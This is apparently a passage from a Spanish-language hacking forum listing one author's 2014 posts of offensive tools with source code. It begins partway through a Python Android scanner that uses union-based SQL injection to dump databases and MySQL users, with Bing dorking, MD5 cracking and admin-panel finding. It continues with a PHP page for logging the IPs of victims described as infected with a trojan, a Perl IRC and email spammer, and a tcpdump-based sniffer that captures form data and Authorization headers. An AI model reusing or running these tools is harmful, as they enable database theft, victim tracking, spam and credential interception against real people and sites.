aplicacion.dialogCreateAlert("SQLI Scanner")
aplicacion.dialogGetInput("SQLI Scanner","Enter DB Name")
ref = aplicacion.dialogGetResponse().result
if not ref['which'] == 'positive' :
menusql()
else:
db = ref['value']
aplicacion.dialogCreateSpinnerProgress("SQLI Scanner","[+] Searching Tables of DB ...")
aplicacion.dialogShow()
don = showtablesdb(webvul,db)
aplicacion.dialogDismiss()
aplicacion.dialogCreateAlert("SQLI Scanner",don)
aplicacion.dialogSetPositiveButtonText("Done")
aplicacion.dialogShow()
op = aplicacion.dialogGetResponse().result
if op["which"] == "positive" :
menusql()
if opsql==4 :
aplicacion.dialogCreateAlert("SQLI Scanner")
aplicacion.dialogGetInput("SQLI Scanner","Enter DB Name")
ref = aplicacion.dialogGetResponse().result
if not ref['which'] == 'positive' :
menusql()
else:
db = ref['value']
aplicacion.dialogGetInput("SQLI Scanner","Enter Table")
ref = aplicacion.dialogGetResponse().result
if not ref['which'] == 'positive' :
menusql()
else:
tabla = ref['value']
aplicacion.dialogCreateSpinnerProgress("SQLI Scanner","[+] Searching Columns of DB ...")
aplicacion.dialogShow()
don = showcolumnsdb(webvul,db,tabla)
aplicacion.dialogDismiss()
aplicacion.dialogCreateAlert("SQLI Scanner",don)
aplicacion.dialogSetPositiveButtonText("Done")
aplicacion.dialogShow()
op = aplicacion.dialogGetResponse().result
if op["which"] == "positive" :
menusql()
if opsql==5 :
aplicacion.dialogCreateAlert("SQLI Scanner")
aplicacion.dialogCreateSpinnerProgress("SQLI Scanner","[+] Searching mysql.users ...")
aplicacion.dialogShow()
don = mysqluser(webvul)
aplicacion.dialogDismiss()
aplicacion.dialogCreateAlert("SQLI Scanner",don)
aplicacion.dialogSetPositiveButtonText("Done")
aplicacion.dialogShow()
op = aplicacion.dialogGetResponse().result
if op["which"] == "positive" :
menusql()
if opsql==6 :
aplicacion.dialogCreateAlert("SQLI Scanner")
aplicacion.dialogCreateSpinnerProgress("SQLI Scanner","[+] Getting Information ...")
aplicacion.dialogShow()
don = more(webvul)
aplicacion.dialogDismiss()
aplicacion.dialogCreateAlert("SQLI Scanner",don)
aplicacion.dialogSetPositiveButtonText("Done")
aplicacion.dialogShow()
op = aplicacion.dialogGetResponse().result
if op["which"] == "positive" :
menusql()
if opsql==7 :
aplicacion.dialogCreateAlert("SQLI Scanner")
aplicacion.dialogGetInput("SQLI Scanner","Enter Table")
ref = aplicacion.dialogGetResponse().result
if not ref['which'] == 'positive' :
menusql()
else:
tabla = ref['value']
aplicacion.dialogGetInput("SQLI Scanner","Enter Column1")
ref = aplicacion.dialogGetResponse().result
if not ref['which'] == 'positive' :
menusql()
else:
columna1 = ref['value']
aplicacion.dialogGetInput("SQLI Scanner","Enter Column2")
ref = aplicacion.dialogGetResponse().result
if not ref['which'] == 'positive' :
menusql()
else:
columna2 = ref['value']
aplicacion.dialogCreateSpinnerProgress("SQLI Scanner","[+] Getting Values ...")
aplicacion.dialogShow()
don = dumper(webvul,tabla,columna1,columna2)
aplicacion.dialogDismiss()
aplicacion.dialogCreateAlert("SQLI Scanner",don)
aplicacion.dialogSetPositiveButtonText("Done")
aplicacion.dialogShow()
op = aplicacion.dialogGetResponse().result
if op["which"] == "positive" :
menusql()
if opsql==8:
menu()
def menu():
aplicacion.dialogCreateAlert("ParanoicScan 0.3 (C) Doddy Hackman 2014")
aplicacion.dialogSetItems(["BingHackTool","SQLI Scanner","MD5 Cracker","Admin Finder","Locate IP","HTTP FingerPrinting","Encoders","About","Exit"])
aplicacion.dialogShow()
re = aplicacion.dialogGetResponse().result
re2 = re["item"]
if re2==0:
aplicacion.dialogCreateAlert("BingHack Tool")
aplicacion.dialogGetInput("BingHack Tool","Enter Dork")
ref = aplicacion.dialogGetResponse().result
if not ref['which'] == 'positive' :
menu()
else:
dork = ref['value']
aplicacion.dialogGetInput("BingHack Tool","Enter number of pages to search")
ref = aplicacion.dialogGetResponse().result
if not ref['which'] == 'positive' :
menu()
else:
paginas = ref['value']
paginas = str(paginas)
aplicacion.dialogCreateSpinnerProgress("BingHack Tool","Searching ...")
aplicacion.dialogShow()
founds = ""
rez = ""
rtafinal = ""
founds = bingscan(dork,paginas)
aplicacion.dialogDismiss()
aplicacion.dialogCreateSpinnerProgress("BingHack Tool","Scanning ...")
aplicacion.dialogShow()
rez = sqltest(founds)
if len(rez) == 0 :
rtafinal = "[-] Not Found"
else :
rtafinal = "[++] Pages Founds\n\n"
rtafinal = rtafinal + rez
rtafinal = rtafinal + "\n[++] Finished\n"
aplicacion.dialogDismiss()
aplicacion.dialogCreateAlert("BingHack Tool",rtafinal)
aplicacion.dialogSetPositiveButtonText("Done")
aplicacion.dialogShow()
op = aplicacion.dialogGetResponse().result
if op["which"] == "positive" :
menu()
if re2==1 :
global webvul
aplicacion.dialogCreateAlert("SQLI Scanner")
aplicacion.dialogGetInput("SQLI Scanner","Enter Page")
ref = aplicacion.dialogGetResponse().result
if not ref['which'] == 'positive' :
menu()
else:
web = ref['value']
aplicacion.dialogCreateSpinnerProgress("SQLI Scanner","[+] Scanning ...")
aplicacion.dialogShow()
pass1,pass2 = bypass("--")
code = toma(web+"1"+pass1+"and"+pass1+"1=0"+pass2)
codedos = toma(web+"1"+pass1+"and"+pass1+"1=1"+pass2)
if not code==codedos:
aplicacion.dialogDismiss()
aplicacion.dialogCreateAlert("SQLI Scanner","[+] SQLI Detected")
aplicacion.dialogSetPositiveButtonText("Done")
aplicacion.dialogShow()
op = aplicacion.dialogGetResponse().result
if op["which"] == "positive" :
pass1,pass2 = bypass("--")
rtacondata = ""
control_sql = 0
aplicacion.dialogCreateSpinnerProgress("SQLI Scanner","[+] Finding columns length")
aplicacion.dialogShow()
number = "unhex(hex(concat(0x4b30425241,1,0x4b30425241)))"
for te in range(2,30):
number = str(number)+","+"unhex(hex(concat(0x4b30425241,"+str(te)+",0x4b30425241)))"
code = toma(web+"1"+pass1+"and"+pass1+"1=0"+pass1+"union"+pass1+"select"+pass1+number+pass2)
if(regexver(code)):
numbers = regexdar(code)
control_sql = 1
rtacondata = rtacondata + "[+] Column length : "+str(te)
rtacondata = rtacondata + "\n[+] Numbers "+str(numbers)+" print data"
sql = ""
tex = te + 1
for sqlix in range(2,tex):
sql = str(sql)+","+str(sqlix)
sqli = str(1)+sql
sqla = reem(sqli,numbers[0])
aplicacion.dialogDismiss()
aplicacion.dialogCreateAlert("SQLI Scanner",rtacondata)
aplicacion.dialogSetPositiveButtonText("Done")
aplicacion.dialogShow()
op = aplicacion.dialogGetResponse().result
if op["which"] == "positive" :
webvul = web+"-1"+pass1+"union"+pass1+"select"+pass1+sqla
menusql()
if control_sql==0:
aplicacion.dialogDismiss()
aplicacion.dialogCreateAlert("SQLI Scanner","[-] Length dont found")
aplicacion.dialogSetPositiveButtonText("Done")
aplicacion.dialogShow()
op = aplicacion.dialogGetResponse().result
if op["which"] == "positive" :
aplicacion.exit()
else:
aplicacion.dialogDismiss()
aplicacion.dialogCreateAlert("SQLI Scanner","[-] Not Vulnerable")
aplicacion.dialogSetPositiveButtonText("Done")
aplicacion.dialogShow()
op = aplicacion.dialogGetResponse().result
if op["which"] == "positive" :
aplicacion.exit()
if re2==2 :
aplicacion.dialogCreateAlert("MD5 Cracker")
aplicacion.dialogGetInput("MD5 Cracker","Enter MD5")
ref = aplicacion.dialogGetResponse().result
if not ref['which'] == 'positive' :
menu()
else:
target = ref['value']
aplicacion.dialogCreateSpinnerProgress("MD5 Cracker","[+] Cracking ...")
aplicacion.dialogShow()
don = crackmd5(target)
aplicacion.dialogDismiss()
aplicacion.dialogCreateAlert("MD5 Cracker",don)
aplicacion.dialogSetPositiveButtonText("Done")
aplicacion.dialogShow()
op = aplicacion.dialogGetResponse().result
if op["which"] == "positive" :
menu()
if re2==3 :
aplicacion.dialogCreateAlert("Admin Finder")
aplicacion.dialogGetInput("Admin Finder","Enter Target")
ref = aplicacion.dialogGetResponse().result
if not ref['which'] == 'positive' :
menu()
else:
target = ref['value']
aplicacion.dialogCreateSpinnerProgress("Admin Finder","[+] Searching ...")
aplicacion.dialogShow()
don = scanpanel(target)
aplicacion.dialogDismiss()
aplicacion.dialogCreateAlert("Admin Finder",don)
aplicacion.dialogSetPositiveButtonText("Done")
aplicacion.dialogShow()
op = aplicacion.dialogGetResponse().result
if op["which"] == "positive" :
menu()
if re2==4 :
aplicacion.dialogCreateAlert("LocateIP")
aplicacion.dialogGetInput("LocateIP","Enter Target")
ref = aplicacion.dialogGetResponse().result
if not ref['which'] == 'positive' :
menu()
else:
target = ref['value']
aplicacion.dialogCreateSpinnerProgress("LocateIP","[+] Searching ...")
aplicacion.dialogShow()
don = locateip(target)
aplicacion.dialogDismiss()
aplicacion.dialogCreateAlert("LocateIP",don)
aplicacion.dialogSetPositiveButtonText("Done")
aplicacion.dialogShow()
op = aplicacion.dialogGetResponse().result
if op["which"] == "positive" :
menu()
if re2==5 :
aplicacion.dialogCreateAlert("HTTP FingerPrinting")
aplicacion.dialogGetInput("HTTP FingerPrinting","Enter Target")
ref = aplicacion.dialogGetResponse().result
if not ref['which'] == 'positive' :
menu()
else:
target = ref['value']
aplicacion.dialogCreateSpinnerProgress("HTTP FingerPrinting","[+] Scanning ...")
aplicacion.dialogShow()
don = httpfinger(target)
aplicacion.dialogDismiss()
aplicacion.dialogCreateAlert("HTTP FingerPrinting",don)
aplicacion.dialogSetPositiveButtonText("Done")
aplicacion.dialogShow()
op = aplicacion.dialogGetResponse().result
if op["which"] == "positive" :
menu()
if re2==6 :
menuencoder()
if re2==7 :
about = "This program was written by Doddy Hackman in the summer of 2014"
aplicacion.dialogCreateAlert("About",about)
aplicacion.dialogSetPositiveButtonText("Done")
aplicacion.dialogShow()
op = aplicacion.dialogGetResponse().result
if op["which"] == "positive" :
menu()
if re2==8 :
aplicacion.exit()
menu()
# The End ?
Si quieren bajarlo lo pueden hacer de aca
#155
PHP / [PHP] DH Defacer Tools 0.8
31 Enero 2014, 04:13 AM
Un simple programa en PHP dedicado a las vulnerabilidades webs con las siguientes opciones :
- Bing Scanner con scanner SQLI incluido
- SQLI Scanner
- LFI Scanner
- Crackear varias hashes MD5
- Buscador del panel de administracion
- Localizador de IP y sus DNS
- Encoders para base64,HEX y MD5
Un video con ejemplos de uso :
[youtube=640,360]http://www.youtube.com/watch?v=5DlVOKjKtJk[/youtube]
Si quieren bajar el codigo lo pueden hacer de aca
#156
PHP / [PHP] IP Capture 0.2
27 Enero 2014, 19:08 PM
Un simple programa en PHP para capturar la IP de algun visitante , en realidad no funciona como contador y esas cosas , lo hice pensando en capturar la IP de alguien despues de infectarlo con cualquier cosa ya sea troyano u otras cosas.
La idea es asi , mandarle a la victima la url con ?id= , por ejemplo en mi caso el archivo es image.php , entonces para mandarle a la victima seria asi :
http://localhost/images/image.php?id=
De esa forma el programa captura la IP y la hora , despues de esto el programa redirecciona a la url marcada por ustedes en la configuracion del programa.
Para entrar a la administracion es asi :
http://localhost/images/image.php?admin=
El codigo :
La idea es asi , mandarle a la victima la url con ?id= , por ejemplo en mi caso el archivo es image.php , entonces para mandarle a la victima seria asi :
http://localhost/images/image.php?id=
De esa forma el programa captura la IP y la hora , despues de esto el programa redirecciona a la url marcada por ustedes en la configuracion del programa.
Para entrar a la administracion es asi :
http://localhost/images/image.php?admin=
El codigo :
Código (php) [Seleccionar]
<?php
// IP Capture 0.2
// Written By Doddy Hackman in the summer of the 2014
//Edit
$username = "admin";
$password = "21232f297a57a5a743894a0e4a801fc3"; //admin
$host = "localhost";
$userw = "root";
$passw = "";
$db = "ip";
//
error_reporting(0);
if (isset($_GET['id'])) {
mysql_connect($host, $userw, $passw);
mysql_select_db($db);
$ipa = ip2long($_SERVER[REMOTE_ADDR]);
$ip = mysql_real_escape_string($_SERVER[REMOTE_ADDR]);
$agente = mysql_real_escape_string($_SERVER['HTTP_USER_AGENT']);
$hora = mysql_real_escape_string(date('l jS \of F Y h:i:s A'));
if ($ipa == - 1 || $ipa === FALSE || $ip == "127.0.0.1") {
//echo $ip."<br>";
//echo $agente."<br>";
//echo $hora."<br>";
mysql_query("INSERT INTO ips (id,ip,useragent,hora) values (NULL,'$ip','$agente','$hora')");
$link = mysql_query("select link from links where id=1");
if ($valor = mysql_fetch_array($link)) {
echo "<meta http-equiv='Refresh' content='0;url=$valor[0]'>";
}
} else {
echo "<script>alert('Good Try Bitch');</script>";
}
mysql_close();
} elseif (isset($_GET['admin'])) {
if (isset($_COOKIE['portal'])) {
$st = base64_decode($_COOKIE['portal']);
$plit = split("@", $st);
$user = $plit[0];
$pass = $plit[1];
if ($user == $username and $pass == $password) {
darcolor();
mysql_connect($host, $userw, $passw);
mysql_select_db($db);
if (isset($_POST['instalar'])) {
$todo = "create table ips (
id int(10) UNSIGNED NOT NULL AUTO_INCREMENT,
ip TEXT NOT NULL,
useragent TEXT NOT NULL,
hora TEXT NOT NULL,
PRIMARY KEY(id));
";
$todo2 = "create table links (
id int(10) UNSIGNED NOT NULL AUTO_INCREMENT,
link TEXT NOT NULL,
PRIMARY KEY(id));
";
if (mysql_query($todo)) {
if (mysql_query($todo2)) {
mysql_query("INSERT INTO links (id,link) values (NULL,'http://www.google.com')");
echo "<script>alert('Installed');</script>";
echo '<meta http-equiv="refresh" content=0;URL=>';
}
} else {
echo "<script>alert('Error');</script>";
}
}
if (mysql_num_rows(mysql_query("show tables like 'ips'"))) {
//Lo demas
echo "<table border=1 style='margin: 0 auto;'>";
echo "<title>IP Capture Administration 0.2</title>";
echo "<td><br><center><h1><b>IP Capture Administration 0.2</h1></b></center><br><br></td><tr>";
if (isset($_GET['del'])) {
$id = $_GET['del'];
if (is_numeric($id)) {
if (mysql_query("delete from ips where id ='$id'")) {
echo "<script>alert('Deleted');</script>";
} else {
echo "<script>alert('Error');</script>";
}
}
}
if (isset($_POST['linknuevo'])) {
$linkar = mysql_real_escape_string($_POST['linknuevo']);
if (mysql_query("update links set link='$linkar' where id=1")) {
echo "<script>alert('Changed');</script>";
} else {
echo "<script>alert('Error');</script>";
}
}
echo "<td>
<center><table borde=1><td>
<h2><center><br>Update Link</center></h2></td><tr><br><br><td>
<form action='?admin=na&linknuevo' method=POST><br>
<b>Link : </b><input type=text size=50 name=linknuevo value=";
$link = mysql_query("select link from links where id=1");
if ($valor = mysql_fetch_array($link)) {
echo $valor[0];
}
echo "></td><tr><td><center><br><input type=submit value=Changed></center><br></td><tr></table><br>
</form></td><tr>
<br><td>";
$iny = htmlentities("http://" . $_SERVER['HTTP_HOST'] . $_SERVER['PHP_SELF'] . "?id=");
echo "<center><table border=1><br>";
echo "<td><h2><br><center>Link to Send</center></h2></td><tr>";
echo "<td><input text=gen size=100 value=" . $iny . "></td><tr>";
echo "<br></table></center><br>";
echo "<br><center><table border=1>
<td><h2><center>Logs</center></h2></td><tr><td>
<table border=1>
<td>ID</td><td>IP</td><td>UserAgent</td><td>DateTime</td><td>Option</td><tr>";
$sen = @mysql_query("select * from ips order by id ASC");
while ($ab = @mysql_fetch_array($sen)) {
echo "<td>" . htmlentities($ab[0]) . "</td><td>" . htmlentities($ab[1]) . "</td><td>" . htmlentities($ab[2]) . "</td><td>" . htmlentities($ab[3]) . "</td><td><a href=?admin=na&del=" . htmlentities($ab[0]) . ">Delete</a></td><tr>";
}
echo "</table></center><br><br><br></td>
</center>
</td><tr></table>
";
echo "<br><br><br><center><h1>-- == (C) Doddy Hackman 2014 == --</h1></center><br><br></table>";
//
} else {
echo "
<center><br><br>
<form action='' method=POST>
<h2>You want to install IP Capture 0.2 ?</h2><br><br>
<input type=submit name=instalar value=Install>
</form>";
}
mysql_close();
exit(1);
// End
} else {
echo "<script>alert('Fuck You');</script>";
}
}
if (isset($_POST['login'])) {
if ($_POST['user'] == $username and md5($_POST['password']) == $password) {
setcookie("portal", base64_encode($_POST['user'] . "@" . md5($_POST['password'])));
echo "<script>alert('Welcome Idiot');</script>";
echo '<meta http-equiv="refresh" content=0;URL=?admin=>';
} else {
echo "<script>alert('Fuck You');</script>";
}
} else {
darcolor();
echo "
<title>IP Capture 0.2</title>
<br><h1><center>IP Capture 0.2</center></h1>
<br><br><center>
<form action='' method=POST>
Username : <input type=text name=user><br>
Password : <input type=text name=password><br><br>
<input type=submit name=login value=Enter><br>
</form>
</center><br><br>";
}
} else {
mysql_connect($host, $userw, $passw);
mysql_select_db($db);
$link = mysql_query("select link from links where id=1");
if ($valor = mysql_fetch_array($link)) {
echo "<meta http-equiv='Refresh' content='0;url=$valor[0]'>";
}
mysql_close();
}
function darcolor() {
echo '<style type="text/css">
.main {
margin : -287px 0px 0px -490px;
border : White solid 1px;
BORDER-COLOR: #00FF00;
}
#pie {
position: absolute;
bottom: 0;
}
body,a:link {
background-color: #000000;
color:#00FF00;
Courier New;
cursor:crosshair;
font-size: small;
}
input,table.outset,table.bord,table,textarea,select,fieldset,td,tr {
font: normal 10px Verdana, Arial, Helvetica,
sans-serif;
background-color:black;color:#00FF00;
border: solid 1px #00FF00;
border-color:#00FF00
}
a:link,a:visited,a:active {
color: #00FF00;
font: normal 10px Verdana, Arial, Helvetica,
sans-serif;
text-decoration: none;
}
</style>';
}
// The End ?
?>
#157
Scripting / [Perl] KingSpam 0.8
24 Enero 2014, 17:17 PM
Un simple script para spammear cuentas de correo y canales IRC.
El codigo.
El codigo.
Código (perl) [Seleccionar]
#!usr/bin/perl
#King Spam 0.8
#(C) Doddy Hackman 2014
use IO::Socket;
use Win32::OLE;
menu();
copyright();
sub menu {
head();
print qq(
[++] Options
[+] 1 : Spam IRC Channel
[+] 2 : Spam E-mail Address
[+] 3 : About
[+] 4 : Exit
);
print "[+] Option : ";
chomp( my $op = <stdin> );
$SIG{INT} = \&volver;
if ( $op eq "1" ) {
print "\n\n-- == IRC Spammer == --\n\n";
print "\n[+] Hostname : ";
chomp( my $hostname = <stdin> );
print "\n[+] Port : ";
chomp( my $port = <stdin> );
print "\n[+] Channel : ";
chomp( my $canal = <stdin> );
print "\n[+] Nickname : ";
chomp( my $nombre = <stdin> );
print "\n[+] Spam : ";
chomp( my $archivo = <stdin> );
my @spamnow = cargarword($archivo);
print "\n[+] Connecting\n\n";
if (
my $socket = new IO::Socket::INET(
PeerAddr => $hostname,
PeerPort => $port,
Proto => "tcp"
)
)
{
print $socket "NICK $nombre\r\n";
print $socket "USER $nombre 1 1 1 1\r\n";
print $socket "JOIN $canal\r\n";
print "[+] Spammer Online\n\n";
while ( my $log = <$socket> ) {
chomp $log;
if ( $log =~ /^PING(.*)$/i ) {
print $socket "PONG $1\r\n";
}
if ( $log =~ m/:(.*) 353 (.*) = (.*) :(.*)/ig ) {
while (true) {
my $pro = $4;
sleep 10;
print $socket "PRIVMSG $canal "
. $spamnow[ rand(@spamnow) ] . "\r\n";
my @nicks = split " ", $pro;
sleep 3;
foreach $names (@nicks) {
unless ( $nombre eq $names ) {
$names =~ s/\@//;
print $socket
"MSG $names $spamnow[rand(@spamnow)]\r\n";
print "[+] Spam : $names !\n";
}
}
}
}
}
}
else {
print "[-] Error\n";
print "\n[+] Finished\n";
<stdin>;
menu();
}
}
elsif ( $op eq "2" ) {
print "\n\n-- == Spam Mails == --\n\n";
print "\n[+] Host : ";
chomp( my $host = <stdin> );
print "\n[+] Port : ";
chomp( my $puerto = <stdin> );
print "\n[+] Username : ";
chomp( my $username = <stdin> );
print "\n[+] Password : ";
chomp( my $password = <stdin> );
print "\n[+] Count Message : ";
chomp( my $count = <stdin> );
print "\n[+] To : ";
chomp( my $to = <stdin> );
print "\n[+] Subject : ";
chomp( my $asunto = <stdin> );
print "\n[+] Body : ";
chomp( my $body = <stdin> );
print "\n[+] File to Send : ";
chomp( my $file = <stdin> );
print "\n[+] Starting ...\n\n";
for my $num ( 1 .. $count ) {
print "[+] Sending Message : $num\n";
sendmail(
$host, $puerto, $username, $password,
$username, $username, $username, $to,
$asunto, $body, $file
);
}
print "\n[+] Finished\n";
<stdin>;
menu();
}
elsif ( $op eq "3" ) {
print
"\n\n[+] This program was written by Doddy Hackman in the summer of the 2014\n";
<stdin>;
menu();
}
elsif ( $op eq "4" ) {
copyright();
<stdin>;
exit(1);
}
else {
menu();
}
}
#Functions
sub sendmail {
## Function Based on : http://code.activestate.com/lists/pdk/5351/
## Credits : Thanks to Phillip Richcreek and Eric Promislow
my (
$host, $port, $username, $password, $from, $cc,
$bcc, $to, $asunto, $mensaje, $file
) = @_;
$correo = Win32::OLE->new('CDO.Message');
$correo->Configuration->Fields->SetProperty( "Item",
'http://schemas.microsoft.com/cdo/configuration/sendusername',
$username );
$correo->Configuration->Fields->SetProperty( "Item",
'http://schemas.microsoft.com/cdo/configuration/sendpassword',
$password );
$correo->Configuration->Fields->SetProperty( "Item",
'http://schemas.microsoft.com/cdo/configuration/smtpserver', $host );
$correo->Configuration->Fields->SetProperty( "Item",
'http://schemas.microsoft.com/cdo/configuration/smtpserverport',
$port );
$correo->Configuration->Fields->SetProperty( "Item",
'http://schemas.microsoft.com/cdo/configuration/smtpusessl', 1 );
$correo->Configuration->Fields->SetProperty( "Item",
'http://schemas.microsoft.com/cdo/configuration/sendusing', 2 );
$correo->Configuration->Fields->SetProperty( "Item",
'http://schemas.microsoft.com/cdo/configuration/smtpauthenticate', 1 );
$correo->Configuration->Fields->Update();
if ( -f $file ) {
$correo->AddAttachment($file);
}
$correo->{From} = $from;
$correo->{CC} = $cc;
$correo->{BCC} = $bcc;
$correo->{To} = $to;
$correo->{Subject} = $asunto;
$correo->{TextBody} = $mensaje;
$correo->Send();
}
sub volver {
print "\n\n[+] Finished\n";
<stdin>;
menu();
}
sub cargarword {
my @words;
my @r;
open( FILE, $_[0] );
@words = <FILE>;
close FILE;
for (@words) {
push( @r, $_ );
}
return (@r);
}
sub limpiarpantalla {
if ( $^O =~ /Win/ ) {
system("cls");
}
else {
system("clear");
}
}
sub head {
limpiarpantalla();
print qq(
@ @ @ @ @ @@@@ @@@ @@@@@ @ @ @
@ @ @ @@ @ @ @ @ @ @ @ @ @ @
@ @ @ @@ @ @ @ @ @ @ @ @@ @@
@@ @ @ @ @ @ @ @ @ @ @ @@ @@
@@ @ @ @ @ @ @@@ @@@ @@@@@ @ @ @ @ @ @
@ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @
@ @ @ @ @@ @ @ @ @ @@@@@ @ @ @
@ @ @ @ @@ @ @@ @ @ @ @ @ @ @ @
@ @ @ @ @ @@@ @ @@@ @ @ @ @ @
);
}
sub copyright {
print "\n\n-- == (C) Doddy Hackman 2014 == --\n";
}
# The End ?
#158
Scripting / [Perl] DH Sniffer 0.3
18 Enero 2014, 23:56 PM
Un simple sniffer en perl para capturar todo lo que pasa en los metodos GET y POST
El codigo :
Eso es todo.
El codigo :
Código (perl) [Seleccionar]
#!usr/bin/perl
#DH Sniffer 0.3
#(C) Doddy Hackman 2014
#Credits :
#Based on :
#http://stackoverflow.com/questions/4777042/can-i-use-tcpdump-to-get-http-requests-response-header-and-response-body
#http://www.perlmonks.org/?node_id=656590
#http://stein.cshl.org/~lstein/talks/WWW6/sniffer/
#http://perlenespanol.com/foro/post36051.html
#Thanks to : Lincoln D. Stein , paulz and Explorer
use CGI;
use threads;
use URI::Escape;
$| = 1;
my $control = shift;
head();
if ( $control eq "" ) {
print "\n[+] Sintax : $0 <option>\n";
print "\n[++] Options :\n";
print "\n[+] -g : Capture method GET\n";
print "[+] -p : Capture method POST\n";
print "\n[+] Example : sudo perl $0 -pg\n";
copyright();
}
print "\n";
my $hilo_get = threads->new( \&sniffer_get );
my $hilo_post = threads->new( \&sniffer_post );
$hilo_get->join;
$hilo_post->join;
sub sniffer_get {
if ( $control =~ /g/ ) {
open( GET, "/usr/sbin/tcpdump -lnx -s 1024 dst port 80 |" );
while (<GET>) {
if (/^\S/) {
while ( $contenido =~
/(GET|POST|WWW-Authenticate|Authorization).+/g )
{
print "\n[+] $ip = $name " . uri_unescape($&);
savefile( "logs", "\n[+] $ip = $name " . uri_unescape($&) );
}
undef $ip;
undef $name;
undef $contenido;
( $ip, $name ) =
/IP (\d+\.\d+\.\d+\.\d+).+ > (\d+\.\d+\.\d+\.\d+)/;
}
s/\s+//g;
s/0x[abcdef\d]+://i;
s/([0-9a-f]{2})/chr(hex($1))/eg;
tr/\x1F-\x7E\r\n//cd;
$contenido .= $_;
}
}
}
sub sniffer_post {
if ( $control =~ /p/ ) {
open( POST,
"tcpdump -A -s 0 'tcp port 80 and (((ip[2:2] - ((ip[0]&0xf)<<2)) - ((tcp[12]&0xf0)>>2)) != 0)' |"
);
while (<POST>) {
if (/^\S/) {
my $code = $_;
$buscando = CGI->new($code);
my @params = $buscando->param;
foreach $par (@params) {
if ( $par =~ /\./ ) {
next;
}
else {
my $dataf = $buscando->param($par);
print "\n[+] $par " . " : " . $dataf;
savefile( "logs", "\n[+] $par " . " : " . $dataf );
}
}
}
}
}
}
sub savefile {
open( SAVE, ">>" . $_[0] );
print SAVE $_[1];
close SAVE;
}
sub head {
print "\n-- == DH Sniffer 0.3 == --\n";
}
sub copyright {
print "\n-- == (C) Doddy Hackman 2014 == --\n\n";
exit(1);
}
# The End ?
Eso es todo.
#159
Scripting / Re: Petición de libros de Python y de Perl 6.
11 Enero 2014, 22:47 PM
si , ademas en perlenespanol hay un foro que te ayuda con las dudas ...
#160
Scripting / [Perl] ClapTrap IRC Bot 0.5
10 Enero 2014, 16:11 PM
Hola acabo de mejorar mi bot para irc llamado ClapTrap (basado en el robot gracioso de borderlands) , el bot tiene los siguientes comandos :
- Scanner SQLI
- Scanner LFI
- Buscador de panel de administracion
- Localizador de IP
- Buscador de SQLI y RFI en google
- Crack para hashes MD5
- Cortador de URL usando tinyurl
- HTTP FingerPrinting
- Codificador base64,hex y ASCII
Les dejo un video con ejemplos de uso :
[youtube=640,360]http://www.youtube.com/watch?v=4Hnq3Gi--9M&feature=youtu.be[/youtube]
Si quieren bajar el codigo lo pueden hacer de aca
Eso es todo.